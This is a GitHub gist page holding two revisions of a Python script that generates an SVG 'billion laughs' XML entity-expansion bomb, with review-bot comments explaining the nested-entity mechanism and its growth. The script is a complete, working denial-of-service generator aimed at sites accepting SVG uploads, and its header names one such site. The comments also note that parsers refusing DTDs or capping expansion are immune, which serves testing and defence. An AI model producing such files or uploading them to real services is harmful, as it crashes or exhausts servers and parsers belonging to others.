majestrate revised this gist
Apr 11, 2022 . 1 changed file with 6 additions and 7 deletions.
@@ -1,11 +1,9 @@ #!/usr/bin/env python3 # svg hell -- xml bomb generator for svg # # stop using SVGs # # usage: python3 svghell.py > evil.svg import random import string @@ -38,7 +36,7 @@ class SVGHell: svg xml bomb generator """ def __init__(self, num=10, base_str='bomb', description=None): self.num = num self.base_str = base_str if description is None: @@ -68,4 +66,5 @@ def generate(self): if __name__ == '__main__': svg = SVGHell() print(svg.generate())
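Review bot: `num` now defaults to 10 in `SVGHell.__init__`, but the class docstring ("svg xml bomb generator") still does not say what the parameter controls. Going by the `generate()` body in the original revision further down this page, which none of these hunks appear to touch, each entity level repeats the previous one `num + 1` times over `num` levels, so the expanded text grows as `(num + 1) ** num` copies of `base_str`. I would add a docstring line such as `num: entity nesting depth; expanded size is (num + 1) ** num copies of base_str`. The bodies of `__init__` and `generate` continue outside these hunks.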
majestrate created this gist
Apr 8, 2015 .
@@ -0,0 +1,71 @@ # # svg hell -- xml bomb generator for svg # # for educational use # please don't allow svg on 8ch.net # # usage: python svghell.py > evil.svg # import random import string class appendstr: """ character appending string """ def __init__(self, v='\n'): self.s = '' self.v = v def __add__(self, v): self.s = self.s + v + self.v return self def __str__(self): return self.s randint = lambda : random.randint(1, 1000) def rand_str(strlen): ret = '' for n in range(strlen): ret += random.choice(string.ascii_letters) class SVGHell: """ svg xml bomb generator """ def __init__(self, num, base_str='bomb', description=None): self.num = num self.base_str = base_str if description is None: description = rand_str(randint()) self.description = description def generate(self): """ generate an svg that explodes when loading """ data = appendstr() data += '<?xml version="1.0" standalone="no"?>' data += '<!DOCTYPE svg [' data += '<!ENTITY {}0 "{}">'.format(self.base_str, self.base_str) for n in range(1, self.num + 1): data += '<!ENTITY {}{} "{}">'.format(self.base_str, n, ('&{}{};'.format(self.base_str, n-1)) * (self.num + 1)) data += ']>' data += '<svg width="{}cm" height="{}cm" viewBox="0 0 {} {}" version="1.1"'.format(randint(), randint(), randint(), randint()) data += 'xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">' data += '<desc>{}</desc>'.format(self.description) for _ in range(self.num): data += '<text x="{}" y="{}" d="&{}{};">'.format(randint(), randint(), self.base_str, self.num) data += '</text>' data += '</svg>' return str(data) if __name__ == '__main__': print ( SVGHell(10).generate() )
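Review bot: The `generate` docstring says only that the SVG "explodes when loading" and never names the mechanism, which is the chain of nested internal entities declared in the `<!DOCTYPE svg [` block and referenced from each `<text>` element's `d` attribute. I would spell that out, e.g. `"""Build an SVG whose internal DTD declares num levels of nested entities (a "billion laughs" document)."""`, so a reader can tell which parser feature is involved. A parser that rejects DTDs or caps entity expansion does not expand it, and that is the setting to verify on anything that accepts uploaded SVG.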